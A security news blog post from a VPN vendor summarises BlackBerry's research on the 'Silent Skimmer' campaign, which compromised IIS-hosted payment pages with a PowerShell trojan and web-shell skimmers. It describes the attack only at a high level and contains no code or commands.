scammer alert

Silent Skimmer: Threat Actors Stealing Your Payment Information

2 Mins Read

PureVPNNewsSilent Skimmer: Threat Actors Stealing Your Payment Information

A financially motivated campaign has been persistently targeting online payment enterprises across the Asia Pacific, North America, and Latin America for over a year. 

The research and intelligence team at BlackBerry has been meticulously monitoring this operation, codenamed “Silent Skimmer,” attributing it to a threat actor who exhibits fluency in Chinese. 

Victim Alert: Online businesses and providers of point-of-sale (PoS) services.

Modus Operandi of Threat Actors

  • Exploiting vulnerabilities within web applications, particularly those hosted on Internet Information Services (IIS). 
  • Their primary objective is compromising the payment checkout page, enabling them to acquire sensitive payment data from visitors.
  • Upon successfully establishing an initial foothold, the threat actors employ open-source tools and “living-off-the-land” (LotL) techniques for privilege escalation, post-exploitation activities, and code execution.
HTTP File Server hosting the threat actor’s toolkit for malicious post-exploitation actions
  • The attack chain culminates in deploying a PowerShell-based remote access trojan (server.ps1). 

What does the Trojan do?

This trojan facilitates remote control of the compromised host, which subsequently connects to a remote server housing additional utilities, such as downloading scripts, reverse proxies, and Cobalt Strike beacons.

What might be the motive?

The ultimate objective of this intrusion, as discussed by BlackBerry, is to infiltrate the web server and introduce a scraper into the payment checkout service using a web shell. 

This allows them to secretly capture financial information entered by victims on the payment page.

Examining the adversary’s infrastructure reveals a deliberate effort to select virtual private servers (VPS) for command-and-control (C2) based on the geolocation of victims, aiming to evade detection.

The diversity of industries and regions targeted, along with the type of servers breached, suggests that this campaign leans more towards an opportunistic approach rather than a highly deliberate and targeted one.

“The attacker primarily focuses on regional websites that gather payment data, leveraging vulnerabilities in commonly used technologies to gain unauthorized access and extract sensitive payment information either entered into or stored on the site,” noted BlackBerry.

Are you 360 degrees Secure?

Rising threats, advanced malware and sophisticated tactics are the things we have to deal with today! Securing servers has emerged as one of the main things with this threat. 

Outdated servers with open endpoints are attractive targets for information stealing.

The Silent Skimmer campaign has shown us how easy it is to compromise IIS servers and perform illicit activities. According to BlackBerry, we can expect more such attacks in the future in new regions. 

author

Anas Hasan

date

October 3, 2023

time

2 years ago

Anas Hassan is a tech geek and cybersecurity enthusiast. He has a vast experience in the field of digital transformation industry. When Anas isn’t blogging, he watches the football games.

Related Stories

Arizona Sees Surge in VPN Demand After Age Verification Laws Take Effect

Arizona Sees Surge in VPN Demand After Age Verification Laws Take Effect
Posted on October 8, 2025
A Single Password Breach Shut Down a 158 Year Old Business

A Single Password Breach Shut Down a 158 Year Old Business
Posted on October 7, 2025
Nepal Social Media Ban: How to Access Facebook, Instagram, and YouTube Safely

Nepal Social Media Ban: How to Access Facebook, Instagram, and YouTube Safely
Posted on September 5, 2025

Have Your Say!!